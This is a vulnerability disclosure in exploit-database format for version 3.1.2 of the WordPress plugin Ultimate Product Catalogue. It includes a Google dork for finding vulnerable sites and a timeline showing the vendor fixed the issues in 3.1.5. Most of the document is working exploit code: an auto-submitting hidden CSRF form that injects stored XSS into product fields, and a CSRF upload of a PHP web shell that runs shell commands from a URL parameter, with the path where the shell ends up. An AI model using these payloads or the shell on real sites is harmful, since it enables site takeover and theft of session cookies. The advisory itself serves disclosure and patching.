# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate
Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps

1. Summary:

Ultimate Product Catalogue is a responsive and easily customizable plugin
for all your product catalogue needs. It has +63.000 downloads, +4.000
active installations.

Product Name and Description and File Upload formulary of plugin Ultimate
Product Catalog lacks of proper CSRF protection and proper filtering.
Allowing an attacker to alter a product pressented to a customer or the
wordpress administrators and insert XSS in his product name and
description. It also allows an attacker to upload a php script though a
CSRF due to a lack of file type filtering when uploading it.

2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com

- 22/04/2015: Response from etoilewebdesign.com

 and fixed two SQLi in 3.1.3 but not these vulnerabilities.
        - 28/04/2015: Fixed version in 3.1.5 without notifying me.

3. Vulnerable code:

    In file html/ProductPage multiple lines.

3. Proof of concept:

https://www.youtube.com/watch?v=roB_ken6U4o


 ----------------------------------------------------------------------------------------------
   ------------- CSRF & XSS in Product Description and Name -----------

 ----------------------------------------------------------------------------------------------

<iframe width=0 height=0 style="display:none" name="csrf-frame"></iframe>
<form method='POST'
    action='http://
<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'
    target="csrf-frame"
    id="csrf-form">
        <input type='hidden' name='action' value='Edit_Product'>
        <input type='hidden' name='_wp_http_referer'
value='/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'/>
        <input type='hidden' name='Item_Name' value="Product
name</a><script>alert('Product Name says: '+document.cookie)</script><a>"/>
        <input type='hidden' name='Item_Slug' value='asdf'/>
        <input type='hidden' name='Item_ID' value='16'/>
        <input type='hidden' name='Item_Image' value='
http://i.imgur.com/6cWKujq.gif'>
        <input type='hidden' name='Item_Price' value='666'>
        <input type='hidden' name='Item_Description' value="Product
description says<script>alert('Product description says:
'+document.cookie)</script>"/>
        <input type='hidden' name='Item_SEO_Description' value='seo desc'>
        <input type='hidden' name='Item_Link' value=''>
        <input type='hidden' name='Item_Display_Status' value='Show'>
        <input type='hidden' name='Category_ID' value=''>
        <input type='hidden' name='SubCategory_ID' value=''>
        <input style="display:none" type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>



 ----------------------------------------------------------------------------------------------
   -------- CSRF & File Upload in Product Description and Name ------

 ----------------------------------------------------------------------------------------------

<html>
    <body onload="submitRequest();">
        <script>
          function submitRequest()
          {
            var xhr = new XMLHttpRequest();
            xhr.open("POST",
"http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product",
true);
            xhr.setRequestHeader("Host", "<web>");
            xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
            xhr.setRequestHeader("Cache-Control", "max-age=0");
            xhr.setRequestHeader("Accept-Language",
"en-US,en;q=0.8,es;q=0.6");
            xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT
6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37
Safari/537.36");
            xhr.setRequestHeader("Accept-Encoding", "gzip, deflate");
            xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=----WebKitFormBoundarylPTZvbxAcw0q01W3");
            var body = "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
              "Content-Disposition: form-data;
name=\"Products_Spreadsheet\"; filename=\"cooldog.php\"\r\n" +
              "Content-Type: application/octet-stream\r\n" +
              "\r\n" +
              "<?php\r\n" +
              "exec($_GET['c'],$output);\r\n" +
              "foreach ($output as $line) {\r\n" +
              "echo \"<br/>\".$line;\r\n" +
              "}\r\n" +
              "?>\r\n" +
              "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
              "Content-Disposition: form-data; name='submit'\r\n" +
              "\r\n" +
              "Add New Products\r\n" +
              "------WebKitFormBoundarylPTZvbxAcw0q01W3--\r\n" ;
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
              aBody[i] = body.charCodeAt(i);
            xhr.send(new Blob([aBody]));
          }
        </script>
        <form action="#">
          <input style="display:none;" type="submit" value="Up!"
onclick="submitRequest();" />
      </form>
  </body>
</html>

Te file cooldog.php is no available in path http://
<web>/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php


4. Solution:

    Update to version 3.1.5